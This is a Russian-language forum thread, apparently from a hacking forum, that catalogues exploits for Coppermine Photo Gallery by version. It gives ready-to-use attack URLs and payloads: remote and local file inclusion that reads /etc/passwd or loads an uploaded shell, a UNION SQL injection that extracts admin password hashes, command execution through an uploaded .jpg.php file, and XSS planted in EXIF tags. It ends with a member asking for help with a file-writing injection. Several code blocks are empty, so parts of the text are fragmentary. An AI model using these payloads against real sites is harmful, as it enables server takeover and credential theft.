![]() |
[ Обзор уязвимостей Coppermine Photo Gallery ]
В данном обзоре я собрал уязвимости Coppermine Photo Gallery как самостоятельного скрипта, а не как модуля в различных CMS. Эти баги можно найти здесь:
https://forum.antichat.ru/showthread.php?t=59150 https://forum.antichat.ru/threadnav22857-1-10.html Vendor: http://coppermine-gallery.net/ http://sourceforge.net/project/showfiles.php?group_id=89658 Multiple Remote File Include Vulnerabilities Vulnerable: Coppermine Photo Gallery 1.4.10 Exploit: Код:
http://www.example.com/Script_Path/image_processor.php?cmd=[Shell-Attack]Vulnerable: Coppermine Photo Gallery 1.3.1 Exploit: PHP код:
Vulnerable: Coppermine Photo Gallery 1.4.10 Coppermine Photo Gallery 1.4.9 Coppermine Photo Gallery 1.4.4 Coppermine Photo Gallery 1.3.4 Coppermine Photo Gallery 1.3.3 Coppermine Photo Gallery 1.3.2 Coppermine Photo Gallery 1.3 Coppermine Photo Gallery 1.2.2 bNuke Coppermine Photo Gallery 1.2.2 b Coppermine Photo Gallery 1.2.1 Coppermine Photo Gallery 1.2 Coppermine Photo Gallery 1.1 beta 2 Coppermine Photo Gallery 1.1 .0 Coppermine Photo Gallery 1.0 RC3 Coppermine Photo Gallery 1.0 Exploit: PHP код:
Vulnerable: Coppermine Photo Gallery 1.4.4 Exploit: Код:
http://www.example.com/cpg/index.php?file=.//././/././/././/././/././/././/././/././/./etc/passwd%00Vulnerable: Coppermine Photo Gallery 1.4.3 Coppermine Photo Gallery 1.3.2 Coppermine Photo Gallery 1.3.1 Coppermine Photo Gallery 1.3 Coppermine Photo Gallery 1.2.1 Coppermine Photo Gallery 1.2 Coppermine Photo Gallery 1.1 Coppermine Photo Gallery 1.0 Exploit: Код:
http://www.example.com/[path]/thumbnails.php?lang=../albums/userpics/10002/shell.zip%00Vulnerable: Coppermine Photo Gallery 1.4.9 Exploit: Код:
http://www.example.com/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user_group,concat(user_name,char(58,58),user_password)%20FROM%20cpg149_users%20right%20join%20cpg149_usergroups%20on%20cpg149_users.user_group%20=%20cpg149_usergroups.group_id%20where%20cpg149_usergroups.has_admin_access%20=%201%20--Vulnerable: Coppermine Photo Gallery 1.0 RC3 Exploit: Код:
http://www.example.com/albums/userpics/Copperminer.jpg.php?[command]Vulnerable: Coppermine Photo Gallery <= 1.4.3 Exploit: http://milw0rm.com/exploits/1511 File Retrieval SQL Injection Vulnerable: Coppermine Photo Gallery <= 1.3.2 Exploit: http://milw0rm.com/exploits/1317 Cross Site Scripting and Local File Inclusion Vulnerable: Coppermine Photo Gallery <= 1.4.12 Exploit: Код:
http://localhost/cpg/mode.php?admin_mode=1&referer=javascript:Vulnerable: Coppermine Photo Gallery >=1.3.3 Exploit: Открываем картинку формата .jpg в любом графическом редакторе, который поддерживает работу с метаданными EXIF. Нам нужно изменить тэг модели камеры. Вписываем туда ядовитый код, к примеру: Код:
<script>alert(for Antichat only)</script>Далее заливаем ее на сервер, находим в галерее и кликаем по ней мышью- отображается EXIF- информация, которая не фильтруется. То есть, вылетает алерт "for Antichat only" addhit() function~ SQLinjection attack Vulnerable: Coppermine Photo Gallery 1.4.8 Exploit: Код:
GET /cpg/displayimage.php?album=random&cat=0&pos=-{Not Viewd Image ID} HTTP/1.1 |
Remote SQL Injection
Vulnerable: Coppermine Photo Gallery 1.4.10 Exploit: PHP код:
|
Remote SQL Injection
Vulnerable: Coppermine Photo Gallery <=1.4.14 Exploit: PHP код:
|
Remote Command Execution
Vulnerable: Coppermine Photo Gallery 1.4.14 PoC: http://milw0rm.com/exploits/5019 |
Цитата:
Код:
http://www.example.com/cpg/index.php?file=../../../../../../../../../../../../../../../../../../etc/passwd%00 |
Цитата:
было именно так |
XSS
Vulnerable: Coppermine 1.4.14 PoC: Код:
http://localhost/coppermine.1.4.14/docs/showdoc.php? Vulnerable: Coppermine 1.4.14 Note: атакующий должен иметь привилегии администратора! Уязвимый участок кода: PHP код:
SQL injection in "reviewcom.php" Vulnerable: Coppermine 1.4.14 Note: атакующий должен иметь привилегии администратора! Уязвимый участок кода: PHP код:
При MySQL 4.1.x администратору может получить информацию из БД приложения, используя подзапросы в DELETE. Утечка информации из "update.php" Vulnerable: Coppermine 1.4.14 PoC: Код:
http://victim.com/cpg14x/update.phpРаскрытие пути в "include/slideshow.inc.php" Vulnerable: Coppermine 1.4.14 PoC: Код:
http://localhost/coppermine.1.4.14/include/slideshow.inc.phpКод HTML:
<b>Fatal error</b>: Call to undefined function get_pic_data() in <b> |
Цитата:
Код:
... |
Цитата:
|
Цитата:
Если скопировать и вставить вручную в командную строку mysql то выполнится все, а из php как я полагаю необходимо закрыть комментарий, что в данном случае невозможно, последняя ) будет лишней. Пробовал как у себя так и на другой галлереи, там тоже запрос не выполняется, пишет ошибка БД. Можно конечно простенькие бесталковые запросы создать, там 2 select объединить, чтобы использовалась последняя ), а вот файл создать имхо невозможно, либо это работает в старых версиях mysql. Если кто может помочь, придумайте полезный запрос без /* и -- на конце, ибо с ними не выполняется. Код:
SELECT aid, MD5(alb_password) as md5_password FROM cpg1410_albums WHERE aid IN (inj1,inj2,0)Код:
SELECT aid, MD5(alb_password) as md5_password FROM cpg1410_albums WHERE aid IN (1) --,inj2,0)Код:
SELECT aid, MD5(alb_password) as md5_password FROM cpg1410_albums WHERE aid IN (1) union select 1,2 from cpg1410_albums where aid in (1,0) |
| Время: 02:43 |